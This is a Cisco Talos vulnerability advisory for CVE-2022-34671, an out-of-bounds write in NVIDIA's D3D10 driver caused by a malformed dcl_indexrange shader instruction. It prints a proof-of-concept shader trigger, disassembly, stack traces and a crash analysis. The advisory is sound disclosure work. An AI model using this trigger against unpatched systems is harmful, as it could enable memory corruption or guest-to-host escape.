Talos Vulnerability Report

TALOS-2022-1604

NVIDIA D3D10 Driver Shader Functionality DCL_INDEXRANGE instruction memory corruption vulnerability

December 6, 2022

CVE Number

CVE-2022-34671

SUMMARY

A memory corruption vulnerability exists in the Shader Functionality DCL_INDEXRANGE instruction functionality of NVIDIA D3D10 Driver Version 516.94 and 31.0.15.1694. A specially-crafted executable/shader file can lead to memory corruption. An attacker can use arbitrary code execution to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

NVIDIA D3D10 Driver NVIDIA D3D10 Driver, Version 516.94 , 31.0.15.1694

PRODUCT URLS

D3D10 Driver - https://nvidia.com

CVSSv3 SCORE

8.5 - CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H

CWE

CWE-787 - Out-of-bounds Write

DETAILS

NVIDIA Graphics drivers is software for NVIDIA Graphics GPU installed on the PC. It is used to communicate between the operating system and the GPU device. This software is required in most cases for the hardware device to function properly.

An exploitable memory corruption vulnerability exists in NVIDIA nvwgf2umx.dll graphics driver. A specially crafted compute shader can cause memory corruption vulnerability. An attacker can provide a specially crafted shader file to trigger this vulnerability. This vulnerability potentially could be triggered from guest machines running virtualization environments (ie. VMware, qemu, VirtualBox, etc.) in order to perform guest-to-host escape, as it was demonstrated before (TALOS-2018-0533, TALOS-2018-0568, etc.). Theoretically this vulnerability could be also triggered from web browser (using webGL and webassembly). We were able to trigger this vulnerability from HYPER-V guest using the RemoteFX feature, leading to executing the vulnerable code on the HYPER-V host (inside of the rdvgm.exe process). While the RemoteFX was recently deprecated by Microsoft, some older machines may still use this software.

This vulnerability can be triggered by supplying a malformed compute shader. This leads to memory corruption problems in NVIDIA driver.

Example of compute shader triggering the bug:

	dcl_temps 1
	dcl_indexrange o6.x 8
	dcl_indexrange vicp[32][0].x 11500322			---> malformed dcl_indexrange 
	ult r0.x, vForkInstanceID.x, l(4)
	and r0.x, r0.x, l(1)
	and r0.y, vForkInstanceID.x, l(3)

dcl_indexrange instruction declares a range of registers that will be accessed by index. When setting the MAX index number to a high value, it is possible to cause memory corruption (ECX value for the rep stosw operation is taken directly from the shader bytecode):

	00007FFEEDFF7567 | 8BAA 08040000            | mov ebp,dword ptr ds:[rdx+408]              | (32-bit value taken from byte code, 11500322)
	00007FFEEDFF756D | BA 25100000              | mov edx,1025                                |
	00007FFEEDFF7572 | 48:897424 50             | mov qword ptr ss:[rsp+50],rsi               |
	00007FFEEDFF7577 | 4C:897424 58             | mov qword ptr ss:[rsp+58],r14               |
	00007FFEEDFF757C | 44:8D71 08               | lea r14d,qword ptr ds:[rcx+8]               |
	...
	00007FFEEDFF761D | 49:8D3C7F                | lea rdi,qword ptr ds:[r15+rdi*2]            |
	00007FFEEDFF7621 | 8BCD                     | mov ecx,ebp                                 | 
	00007FFEEDFF7623 | 66F3:AB                  | rep stosw                                   |	repeat value (ECX) taken from bytecode, attacker controls the size for memset()

Stack trace:

	0:038> kb
	 # RetAddr               : Args to Child                                                           : Call Site
	00 00007ffe`edff3af5     : 00007ffe`00000005 0000001b`cd1af150 00000193`90fcac50 00007ffe`edd40000 : nvwgf2umx!NVDEV_Thunk+0x5ee43
	01 00007ffe`edff2806     : 00000000`8eef005b 0000001b`cd1af150 00000000`8eef005b 00000000`8eef0000 : nvwgf2umx!NVDEV_Thunk+0x5b315
	02 00007ffe`ede06db0     : 00000193`90fc02c8 00000000`00000000 00000193`97598f90 0000001b`cd1af6c0 : nvwgf2umx!NVDEV_Thunk+0x5a026
	03 00007ffe`ede082da     : 00000193`90fc02c8 00000000`50000063 00000000`fffffff2 00007fff`7db07955 : nvwgf2umx+0xc6db0
	04 00007ffe`ee187905     : 00000000`00000000 00000193`9106a500 00000000`00000000 00000000`00000000 : nvwgf2umx+0xc82da
	05 00007ffe`ee1876b8     : 00000193`90fc80d0 00000000`00000000 00000193`90a32f80 00000193`90a219d8 : nvwgf2umx!NVDEV_Thunk+0x1ef125
	06 00007ffe`ee288724     : 00000000`00000000 00007fff`7db407b0 00000193`90fcabd0 00000193`90a215d0 : nvwgf2umx!NVDEV_Thunk+0x1eeed8
	07 00007ffe`ee28866f     : 00000000`00000000 00000193`0000000e 00000193`91057bb0 00000000`00000000 : nvwgf2umx!NVDEV_Thunk+0x2eff44
	08 00007ffe`ef01e376     : 00000193`91057bb0 00000000`00000000 00000000`00000000 00000000`00000000 : nvwgf2umx!NVDEV_Thunk+0x2efe8f
	09 00007fff`7c8e7034     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nvwgf2umx!OpenAdapter12+0x5985c6
	0a 00007fff`7db42651     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
	0b 00000000`00000000     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21

Crash Information

	0:038> !analyze -v
	*******************************************************************************
	*                                                                             *
	*                        Exception Analysis                                   *
	*                                                                             *
	*******************************************************************************

	*** WARNING: Unable to verify checksum for POC_EXEC11.exe

	KEY_VALUES_STRING: 1

		Key  : AV.Fault
		Value: Write

		Key  : Analysis.CPU.mSec
		Value: 6453

		Key  : Analysis.DebugAnalysisManager
		Value: Create

		Key  : Analysis.Elapsed.mSec
		Value: 33845

		Key  : Analysis.Init.CPU.mSec
		Value: 3702

		Key  : Analysis.Init.Elapsed.mSec
		Value: 4651672

		Key  : Analysis.Memory.CommitPeak.Mb
		Value: 102

		Key  : Timeline.OS.Boot.DeltaSec
		Value: 681618

		Key  : Timeline.Process.Start.DeltaSec
		Value: 32

		Key  : WER.OS.Branch
		Value: vb_release

		Key  : WER.OS.Timestamp
		Value: 2019-12-06T14:06:00Z

		Key  : WER.OS.Version
		Value: 10.0.19041.1


	NTGLOBALFLAG:  70

	PROCESS_BAM_CURRENT_THROTTLED: 0

	PROCESS_BAM_PREVIOUS_THROTTLED: 0

	APPLICATION_VERIFIER_FLAGS:  0

	EXCEPTION_RECORD:  (.exr -1)
	ExceptionAddress: 00007ffeedff7623 (nvwgf2umx!NVDEV_Thunk+0x000000000005ee43)
	   ExceptionCode: c0000005 (Access violation)
	  ExceptionFlags: 00000000
	NumberParameters: 2
	   Parameter[0]: 0000000000000001
	   Parameter[1]: 000001939107f000
	Attempt to write to address 000001939107f000

	FAULTING_THREAD:  0000240c

	PROCESS_NAME:  POC_EXEC11.exe

	WRITE_ADDRESS:  000001939107f000 

	ERROR_CODE: (NTSTATUS) 0xc0000005 - Instrukcja w 0x%p odwo a a si  do pami ci pod adresem 0x%p. Pami   nie mo e by  %s.

	EXCEPTION_CODE_STR:  c0000005

	EXCEPTION_PARAMETER1:  0000000000000001

	EXCEPTION_PARAMETER2:  000001939107f000

	STACK_TEXT:  
	0000001b`cd1aebe0 00007ffe`edff3af5     : 00007ffe`00000005 0000001b`cd1af150 00000193`90fcac50 00007ffe`edd40000 : nvwgf2umx!NVDEV_Thunk+0x5ee43
	0000001b`cd1aec20 00007ffe`edff2806     : 00000000`8eef005b 0000001b`cd1af150 00000000`8eef005b 00000000`8eef0000 : nvwgf2umx!NVDEV_Thunk+0x5b315
	0000001b`cd1af0d0 00007ffe`ede06db0     : 00000193`90fc02c8 00000000`00000000 00000193`97598f90 0000001b`cd1af6c0 : nvwgf2umx!NVDEV_Thunk+0x5a026
	0000001b`cd1af180 00007ffe`ede082da     : 00000193`90fc02c8 00000000`50000063 00000000`fffffff2 00007fff`7db07955 : nvwgf2umx+0xc6db0
	0000001b`cd1af280 00007ffe`ee187905     : 00000000`00000000 00000193`9106a500 00000000`00000000 00000000`00000000 : nvwgf2umx+0xc82da
	0000001b`cd1af690 00007ffe`ee1876b8     : 00000193`90fc80d0 00000000`00000000 00000193`90a32f80 00000193`90a219d8 : nvwgf2umx!NVDEV_Thunk+0x1ef125
	0000001b`cd1af780 00007ffe`ee288724     : 00000000`00000000 00007fff`7db407b0 00000193`90fcabd0 00000193`90a215d0 : nvwgf2umx!NVDEV_Thunk+0x1eeed8
	0000001b`cd1af830 00007ffe`ee28866f     : 00000000`00000000 00000193`0000000e 00000193`91057bb0 00000000`00000000 : nvwgf2umx!NVDEV_Thunk+0x2eff44
	0000001b`cd1af890 00007ffe`ef01e376     : 00000193`91057bb0 00000000`00000000 00000000`00000000 00000000`00000000 : nvwgf2umx!NVDEV_Thunk+0x2efe8f
	0000001b`cd1af8c0 00007fff`7c8e7034     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nvwgf2umx!OpenAdapter12+0x5985c6
	0000001b`cd1af8f0 00007fff`7db42651     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
	0000001b`cd1af920 00000000`00000000     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21


	SYMBOL_NAME:  nvwgf2umx!NVDEV_Thunk+5ee43

	MODULE_NAME: nvwgf2umx

	IMAGE_NAME:  nvwgf2umx.dll

	STACK_COMMAND:  ~38s ; .cxr ; kb

	FAILURE_BUCKET_ID:  INVALID_POINTER_WRITE_STRING_DEREFERENCE_c0000005_nvwgf2umx.dll!NVDEV_Thunk

	BUCKET_ID_MODPRIVATE: 1

	OS_VERSION:  10.0.19041.1

	BUILDLAB_STR:  vb_release

	OSPLATFORM_TYPE:  x64

	OSNAME:  Windows 10

	IMAGE_VERSION:  31.0.15.1694

	FAILURE_ID_HASH:  {02746a16-78de-d897-f124-8085bc105ade}

	Followup:     MachineOwner
	---------

TIMELINE

2022-09-22 - Vendor Disclosure
2022-09-22 - Initial Vendor Contact
2022-12-01 - Vendor Patch Release
2022-12-06 - Public Release

Credit

Discovered by Piotr Bania of Cisco Talos.

TALOS-2022-1603

TALOS-2022-1541

Intelligence Center

Vulnerability Research

Security Resources

Media

Company